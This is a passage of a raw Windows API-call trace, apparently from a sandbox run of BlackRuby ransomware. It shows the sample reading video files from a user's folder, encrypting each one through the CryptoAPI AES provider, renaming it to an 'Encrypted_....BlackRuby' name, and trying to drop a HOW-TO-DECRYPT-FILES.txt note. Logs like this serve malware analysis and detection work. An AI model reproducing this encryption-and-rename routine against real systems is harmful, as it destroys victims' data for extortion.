dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360e20) returned 1 [0062.894] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.894] GetLastError () returned 0x0 [0062.894] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1bc1b90*=0x1, dwFlags=0x0) returned 1 [0062.894] GetLastError () returned 0x0 [0062.894] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1bc1b5c, dwFlags=0x0) returned 1 [0062.894] GetLastError () returned 0x0 [0062.894] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bc1bd8*, pdwDataLen=0x18ec30*=0xb780, dwBufLen=0xb780 | out: pbData=0x1bc1bd8*, pdwDataLen=0x18ec30*=0xb780) returned 1 [0062.895] GetLastError () returned 0x0 [0062.895] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bd8b04*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1bd8b04*, pdwDataLen=0x18ec48*=0x10) returned 1 [0062.895] GetLastError () returned 0x0 [0062.895] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bd8b34*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1bd8b34*, pdwDataLen=0x18ec50*=0x10) returned 1 [0062.895] GetLastError () returned 0x0 [0062.895] CryptDestroyKey (hKey=0x360b60) returned 1 [0062.895] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.896] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.896] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv", lpFilePart=0x0) returned 0x5a [0062.896] GetLastError () returned 0x0 [0062.896] SetErrorMode (uMode=0x1) returned 0x0 [0062.896] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\cpg35v6livzdz-2.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.897] GetLastError () returned 0xb7 [0062.897] GetFileType (hFile=0x258) returned 0x1 [0062.897] SetErrorMode (uMode=0x0) returned 0x1 [0062.897] GetFileType (hFile=0x258) returned 0x1 [0062.899] CloseHandle (hObject=0x258) returned 1 [0062.899] GetLastError () returned 0xb7 [0062.899] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv", lpFilePart=0x0) returned 0x5a [0062.899] GetLastError () returned 0xb7 [0062.899] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\Encrypted_rtPsnVMYW5rA9DFiQ7enUP98tl0gHoBQBpis8uBvPqQ4f.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\Encrypted_rtPsnVMYW5rA9DFiQ7enUP98tl0gHoBQBpis8uBvPqQ4f.BlackRuby", lpFilePart=0x0) returned 0x88 [0062.899] GetLastError () returned 0xb7 [0062.899] SetErrorMode (uMode=0x1) returned 0x0 [0062.899] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\cpg35v6livzdz-2.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3436290, ftCreationTime.dwHighDateTime=0x1d35006, ftLastAccessTime.dwLowDateTime=0x2ab1e890, ftLastAccessTime.dwHighDateTime=0x1d357a1, ftLastWriteTime.dwLowDateTime=0x2dae7800, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xb790)) returned 1 [0062.899] GetLastError () returned 0xb7 [0062.899] SetErrorMode (uMode=0x0) returned 0x1 [0062.899] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\cpg35v6livzdz-2.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\Encrypted_rtPsnVMYW5rA9DFiQ7enUP98tl0gHoBQBpis8uBvPqQ4f.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\encrypted_rtpsnvmyw5ra9dfiq7enup98tl0ghobqbpis8ubvpqq4f.blackruby")) returned 1 [0062.900] GetLastError () returned 0xb7 [0062.900] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5f [0062.900] GetLastError () returned 0xb7 [0062.900] SetErrorMode (uMode=0x1) returned 0x0 [0062.900] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.900] GetLastError () returned 0x5 [0062.901] SetErrorMode (uMode=0x0) returned 0x1 [0062.901] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv", lpFilePart=0x0) returned 0x59 [0062.901] GetLastError () returned 0x5 [0062.901] SetErrorMode (uMode=0x1) returned 0x0 [0062.901] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\k-wz3_pfw5xm2i.mkv"), fInfoLevelId=0x0, lpFileInformation=0x1c018e0 | out: lpFileInformation=0x1c018e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a84b60, ftCreationTime.dwHighDateTime=0x1d3508b, ftLastAccessTime.dwLowDateTime=0xb7f1b4c0, ftLastAccessTime.dwHighDateTime=0x1d353ea, ftLastWriteTime.dwLowDateTime=0xb7f1b4c0, ftLastWriteTime.dwHighDateTime=0x1d353ea, nFileSizeHigh=0x0, nFileSizeLow=0x16b9f)) returned 1 [0062.901] GetLastError () returned 0x5 [0062.901] SetErrorMode (uMode=0x0) returned 0x1 [0062.902] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv", lpFilePart=0x0) returned 0x59 [0062.902] GetLastError () returned 0x5 [0062.902] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv", lpFilePart=0x0) returned 0x59 [0062.902] GetLastError () returned 0x5 [0062.902] SetErrorMode (uMode=0x1) returned 0x0 [0062.902] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\k-wz3_pfw5xm2i.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.902] GetLastError () returned 0x0 [0062.902] GetFileType (hFile=0x258) returned 0x1 [0062.902] SetErrorMode (uMode=0x0) returned 0x1 [0062.902] GetFileType (hFile=0x258) returned 0x1 [0062.902] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0x16b9f [0062.902] GetLastError () returned 0x0 [0062.903] ReadFile (in: hFile=0x258, lpBuffer=0x2d5ef10, nNumberOfBytesToRead=0x16b9f, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x2d5ef10*, lpNumberOfBytesRead=0x18ec40*=0x16b9f, lpOverlapped=0x0) returned 1 [0062.904] GetLastError () returned 0x0 [0062.904] CloseHandle (hObject=0x258) returned 1 [0062.904] GetLastError () returned 0x0 [0062.905] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv", lpFilePart=0x0) returned 0x59 [0062.905] GetLastError () returned 0x0 [0062.906] SetErrorMode (uMode=0x1) returned 0x0 [0062.906] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\k-wz3_pfw5xm2i.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a84b60, ftCreationTime.dwHighDateTime=0x1d3508b, ftLastAccessTime.dwLowDateTime=0xb7f1b4c0, ftLastAccessTime.dwHighDateTime=0x1d353ea, ftLastWriteTime.dwLowDateTime=0xb7f1b4c0, ftLastWriteTime.dwHighDateTime=0x1d353ea, nFileSizeHigh=0x0, nFileSizeLow=0x16b9f)) returned 1 [0062.906] GetLastError () returned 0x0 [0062.906] SetErrorMode (uMode=0x0) returned 0x1 [0062.906] CryptAcquireContextW (in: phProv=0x18ec08, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec08*=0x37c4e8) returned 1 [0062.906] GetLastError () returned 0x0 [0062.942] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c5da94, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360aa0) returned 1 [0062.942] GetLastError () returned 0x0 [0062.942] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.942] GetLastError () returned 0x0 [0062.947] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.947] GetLastError () returned 0x0 [0062.947] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360ce0) returned 1 [0062.947] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.947] GetLastError () returned 0x0 [0062.947] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x4, pbData=0x1c8aae0*=0x1, dwFlags=0x0) returned 1 [0062.947] GetLastError () returned 0x0 [0062.947] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x1, pbData=0x1c8aaac, dwFlags=0x0) returned 1 [0062.947] GetLastError () returned 0x0 [0062.948] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d8c790*, pdwDataLen=0x18ec30*=0x16c90, dwBufLen=0x16c90 | out: pbData=0x2d8c790*, pdwDataLen=0x18ec30*=0x16c90) returned 1 [0062.949] GetLastError () returned 0x0 [0062.950] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c8ab3c*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1c8ab3c*, pdwDataLen=0x18ec48*=0x10) returned 1 [0062.950] GetLastError () returned 0x0 [0062.950] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c8ab6c*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1c8ab6c*, pdwDataLen=0x18ec50*=0x10) returned 1 [0062.950] GetLastError () returned 0x0 [0062.952] CryptDestroyKey (hKey=0x360aa0) returned 1 [0062.953] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.953] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.953] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv", lpFilePart=0x0) returned 0x59 [0062.953] GetLastError () returned 0x0 [0062.953] SetErrorMode (uMode=0x1) returned 0x0 [0062.953] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\k-wz3_pfw5xm2i.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.954] GetLastError () returned 0xb7 [0062.954] GetFileType (hFile=0x258) returned 0x1 [0062.954] SetErrorMode (uMode=0x0) returned 0x1 [0062.954] GetFileType (hFile=0x258) returned 0x1 [0062.956] CloseHandle (hObject=0x258) returned 1 [0062.956] GetLastError () returned 0xb7 [0062.956] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv", lpFilePart=0x0) returned 0x59 [0062.956] GetLastError () returned 0xb7 [0062.956] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\Encrypted_ekR6sYwNqhYTa8aTZNq32MYj8AHf9AYKMElo0xr.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\Encrypted_ekR6sYwNqhYTa8aTZNq32MYj8AHf9AYKMElo0xr.BlackRuby", lpFilePart=0x0) returned 0x82 [0062.956] GetLastError () returned 0xb7 [0062.956] SetErrorMode (uMode=0x1) returned 0x0 [0062.956] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\k-wz3_pfw5xm2i.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a84b60, ftCreationTime.dwHighDateTime=0x1d3508b, ftLastAccessTime.dwLowDateTime=0xb7f1b4c0, ftLastAccessTime.dwHighDateTime=0x1d353ea, ftLastWriteTime.dwLowDateTime=0x2db7fd80, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x16ca0)) returned 1 [0062.956] GetLastError () returned 0xb7 [0062.956] SetErrorMode (uMode=0x0) returned 0x1 [0062.956] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\k-WZ3_pFW5Xm2i.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\k-wz3_pfw5xm2i.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\Encrypted_ekR6sYwNqhYTa8aTZNq32MYj8AHf9AYKMElo0xr.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\encrypted_ekr6sywnqhyta8atznq32myj8ahf9aykmelo0xr.blackruby")) returned 1 [0062.957] GetLastError () returned 0xb7 [0062.957] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5f [0062.957] GetLastError () returned 0xb7 [0062.957] SetErrorMode (uMode=0x1) returned 0x0 [0062.957] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.957] GetLastError () returned 0x5 [0062.958] SetErrorMode (uMode=0x0) returned 0x1 [0062.958] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4", lpFilePart=0x0) returned 0x5b [0062.958] GetLastError () returned 0x5 [0062.958] SetErrorMode (uMode=0x1) returned 0x0 [0062.958] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\yyvbulzrv9k cfd_.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1ca8158 | out: lpFileInformation=0x1ca8158*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22589140, ftCreationTime.dwHighDateTime=0x1d351b0, ftLastAccessTime.dwLowDateTime=0xa2bb5c30, ftLastAccessTime.dwHighDateTime=0x1d350ef, ftLastWriteTime.dwLowDateTime=0xa2bb5c30, ftLastWriteTime.dwHighDateTime=0x1d350ef, nFileSizeHigh=0x0, nFileSizeLow=0xcf72)) returned 1 [0062.958] GetLastError () returned 0x5 [0062.959] SetErrorMode (uMode=0x0) returned 0x1 [0062.959] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4", lpFilePart=0x0) returned 0x5b [0062.959] GetLastError () returned 0x5 [0062.959] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4", lpFilePart=0x0) returned 0x5b [0062.959] GetLastError () returned 0x5 [0062.959] SetErrorMode (uMode=0x1) returned 0x0 [0062.959] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\yyvbulzrv9k cfd_.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.959] GetLastError () returned 0x0 [0062.959] GetFileType (hFile=0x258) returned 0x1 [0062.959] SetErrorMode (uMode=0x0) returned 0x1 [0062.959] GetFileType (hFile=0x258) returned 0x1 [0062.959] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0xcf72 [0062.959] GetLastError () returned 0x0 [0062.959] ReadFile (in: hFile=0x258, lpBuffer=0x1caa100, nNumberOfBytesToRead=0xcf72, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1caa100*, lpNumberOfBytesRead=0x18ec40*=0xcf72, lpOverlapped=0x0) returned 1 [0062.960] GetLastError () returned 0x0 [0062.960] CloseHandle (hObject=0x258) returned 1 [0062.960] GetLastError () returned 0x0 [0062.960] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4", lpFilePart=0x0) returned 0x5b [0062.960] GetLastError () returned 0x0 [0062.960] SetErrorMode (uMode=0x1) returned 0x0 [0062.960] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\yyVBulzRv9K CFd_.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\yyvbulzrv9k cfd_.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22589140, ftCreationTime.dwHighDateTime=0x1d351b0, ftLastAccessTime.dwLowDateTime=0xa2bb5c30, ftLastAccessTime.dwHighDateTime=0x1d350ef, ftLastWriteTime.dwLowDateTime=0xa2bb5c30, ftLastWriteTime.dwHighDateTime=0x1d350ef, nFileSizeHigh=0x0, nFileSizeLow=0xcf72)) returned 1 [0062.960] GetLastError () returned 0x0 [0062.960] SetErrorMode (uMode=0x0) returned 0x1 [0062.971] CryptImportKey (in: hProv=0x37c708, pbData=0x1d1e400, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360de0) returned 1 [0062.971] GetLastError () returned 0x0 [0062.971] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.971] GetLastError () returned 0x0 [0062.976] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.976] GetLastError () returned 0x0 [0062.976] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360e60) returned 1 [0062.976] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.976] GetLastError () returned 0x0 [0062.976] CryptSetKeyParam (hKey=0x360e60, dwParam=0x4, pbData=0x1d4b44c*=0x1, dwFlags=0x0) returned 1 [0062.976] GetLastError () returned 0x0 [0062.976] CryptSetKeyParam (hKey=0x360e60, dwParam=0x1, pbData=0x1d4b418, dwFlags=0x0) returned 1 [0062.976] GetLastError () returned 0x0 [0062.976] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d4b494*, pdwDataLen=0x18ec30*=0xd070, dwBufLen=0xd070 | out: pbData=0x1d4b494*, pdwDataLen=0x18ec30*=0xd070) returned 1 [0062.976] GetLastError () returned 0x0 [0062.976] 